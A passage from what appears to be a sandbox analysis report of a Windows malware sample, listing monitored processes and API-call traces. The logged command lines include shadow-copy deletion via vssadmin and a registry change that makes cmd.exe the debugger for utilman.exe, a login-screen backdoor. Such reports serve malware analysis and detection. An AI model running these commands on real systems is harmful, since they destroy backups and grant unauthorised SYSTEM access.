"0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00041f84" [0xc000000f] Thread: id = 62 os_tid = 0x6c0 Thread: id = 63 os_tid = 0xa94 Thread: id = 64 os_tid = 0xa80 Thread: id = 65 os_tid = 0xa7c Thread: id = 66 os_tid = 0xa78 Thread: id = 67 os_tid = 0xa74 Thread: id = 68 os_tid = 0xa6c Thread: id = 69 os_tid = 0xa68 Thread: id = 107 os_tid = 0xb60 Thread: id = 135 os_tid = 0x688 Thread: id = 136 os_tid = 0x1c4 Thread: id = 137 os_tid = 0xbcc Thread: id = 138 os_tid = 0x630 Thread: id = 144 os_tid = 0xb50 Process: id = "8" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x62566000" os_pid = "0xa34" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 70 os_tid = 0x734 Thread: id = 71 os_tid = 0xa54 Thread: id = 72 os_tid = 0xa50 Thread: id = 73 os_tid = 0xa4c Thread: id = 74 os_tid = 0xa48 Thread: id = 75 os_tid = 0xa44 Thread: id = 76 os_tid = 0xa3c Thread: id = 77 os_tid = 0xa38 Thread: id = 113 os_tid = 0x3f8 Thread: id = 217 os_tid = 0x614 Process: id = "9" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x478f2000" os_pid = "0xad8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005c6a9" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 80 os_tid = 0xb1c Thread: id = 81 os_tid = 0xad0 [0170.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xd1dd00 | out: lpSystemTimeAsFileTime=0xd1dd00*(dwLowDateTime=0x7c773e80, dwHighDateTime=0x1d61d49)) [0170.258] GetCurrentProcessId () returned 0xad8 [0170.258] GetCurrentThreadId () returned 0xad0 [0170.258] GetTickCount () returned 0x1155513 [0170.258] QueryPerformanceCounter (in: lpPerformanceCount=0xd1dd08 | out: lpPerformanceCount=0xd1dd08*=29043135232) returned 1 [0170.258] malloc (_Size=0x100) returned 0x418e80 Thread: id = 82 os_tid = 0xb0c Thread: id = 83 os_tid = 0xad4 Thread: id = 84 os_tid = 0xb44 Thread: id = 85 os_tid = 0xae4 Thread: id = 86 os_tid = 0xab8 Thread: id = 100 os_tid = 0xb58 Thread: id = 110 os_tid = 0x640 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 87 os_tid = 0xa20 Thread: id = 88 os_tid = 0xacc Thread: id = 89 os_tid = 0x768 Thread: id = 90 os_tid = 0x764 Thread: id = 91 os_tid = 0x758 Thread: id = 92 os_tid = 0x724 Thread: id = 93 os_tid = 0x718 Thread: id = 94 os_tid = 0x714 Thread: id = 95 os_tid = 0x154 Thread: id = 96 os_tid = 0x118 Thread: id = 97 os_tid = 0xf0 Thread: id = 98 os_tid = 0xab4 Thread: id = 99 os_tid = 0xaa8 Thread: id = 131 os_tid = 0xb14 Thread: id = 262 os_tid = 0x920 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47237000" os_pid = "0xbd4" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005ca22" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 101 os_tid = 0xb34 Thread: id = 102 os_tid = 0x174 Thread: id = 103 os_tid = 0xb48 Thread: id = 104 os_tid = 0xae8 Thread: id = 105 os_tid = 0x670 Thread: id = 106 os_tid = 0xbdc Thread: id = 111 os_tid = 0x7c8 Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x56a97000" os_pid = "0xa00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0x9d0 Thread: id = 116 os_tid = 0x284 Thread: id = 117 os_tid = 0xa94 Thread: id = 118 os_tid = 0x710 Thread: id = 119 os_tid = 0x9c0 Process: id = "13" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x5a8b0000" os_pid = "0x150" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 121 os_tid = 0xb04 [0239.997] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fcf0 | out: lpSystemTimeAsFileTime=0x28fcf0*(dwLowDateTime=0xa4d7a3b0, dwHighDateTime=0x1d61d49)) [0239.997] GetCurrentProcessId () returned 0x150 [0239.997] GetCurrentThreadId () returned 0xb04 [0239.997] GetTickCount () returned 0x1165dab [0239.997] QueryPerformanceCounter (in: lpPerformanceCount=0x28fcf8 | out: lpPerformanceCount=0x28fcf8*=36017047450) returned 1 [0239.997] GetModuleHandleW (lpModuleName=0x0) returned 0xff7f0000 [0239.997] __set_app_type (_Type=0x1) [0239.997] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8000d0) returned 0x0 [0239.998] __wgetmainargs (in: _Argc=0xff802140, _Argv=0xff802150, _Env=0xff802148, _DoWildCard=0, _StartInfo=0xff80215c | out: _Argc=0xff802140, _Argv=0xff802150, _Env=0xff802148) returned 0 [0240.000] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0240.001] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0240.002] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x28fcc8 | out: phkResult=0x28fcc8*=0x0) returned 0x2 [0240.002] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0240.002] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0240.002] GetProcessHeap () returned 0x3e0000 [0240.002] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x18) returned 0x3fb640 [0240.002] lstrlenW (lpString="") returned 0 [0240.002] GetProcessHeap () returned 0x3e0000 [0240.002] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x2) returned 0x3fb660 [0240.002] GetProcessHeap () returned 0x3e0000 [0240.002] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5a20 [0240.002] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x18) returned 0x3fb680 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5a50 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5a80 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5ab0 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5ae0 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x18) returned 0x3fb6a0 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5b10 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5b40 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5b70 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5ba0 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x18) returned 0x3fb6c0 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5bd0 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5c00 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5c30 [0240.003] GetProcessHeap () returned 0x3e0000 [0240.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x20) returned 0x3f5c60 [0240.004] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0240.004] GetProcessHeap () returned 0x3e0000 [0240.004] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x18) returned 0x3fb6e0 [0240.004] _memicmp (_Buf1=0x3fb6e0, _Buf2=0xff7f1458, _Size=0x7) returned 0 [0240.004] GetProcessHeap () returned 0x3e0000 [0240.004] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x1e) returned 0x3f5c90 [0240.004] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0240.004] GetProcessHeap () returned 0x3e0000 [0240.004] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x18) returned 0x3fb700 [0240.004] _memicmp (_Buf1=0x3fb700, _Buf2=0xff7f1458, _Size=0x7) returned 0 [0240.004] GetProcessHeap () returned 0x3e0000 [0240.004] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0xbc) returned 0x3fb880 [0240.004] _vsnwprintf (in: _Buffer=0x3f5c90, _BufferCount=0xe, _Format="|%s|", _ArgList=0x28fac8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0240.004] _vsnwprintf (in: _Buffer=0x3fb880, _BufferCount=0x5d, _Format="|%s|", _ArgList=0x28fac8 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe|") returned 92 [0240.004] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0240.004] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe|") returned 92 [0240.005] SetLastError (dwErrCode=0x490) [0240.005] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0240.005] GetProcessHeap () returned 0x3e0000 [0240.005] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0xb6) returned 0x3fb950 [0240.005] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.005] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.006] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.006] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0240.007] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0240.008] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.008] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.008] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0240.008] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.010] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0240.010] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0240.010] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0240.011] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.011] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0240.011] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0240.011] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0240.011] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0240.011] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0240.012] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0240.013] GetProcessHeap () returned 0x3e0000 [0240.013] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x28) returned 0x3f5cc0 [0240.013] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0240.013] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0240.013] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0240.013] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0240.013] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0240.013] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0240.013] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0240.013] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.013] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.013] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.013] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0240.013] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.013] StrChrIW (lpStart="Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0240.013] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.013] StrChrIW (lpStart="Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0240.013] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.013] StrChrIW (lpStart="CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Image File Execution Options\\utilman.exe" [0240.013] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.013] StrChrIW (lpStart="Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\utilman.exe" [0240.014] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.014] StrChrIW (lpStart="utilman.exe", wMatch=0x5c) returned 0x0 [0240.014] SetLastError (dwErrCode=0x490) [0240.014] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.014] SetLastError (dwErrCode=0x0) [0240.014] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0xac) returned 0x3fbc00 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0xd8) returned 0x3fbcc0 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5cc0) returned 1 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] RtlSizeHeap 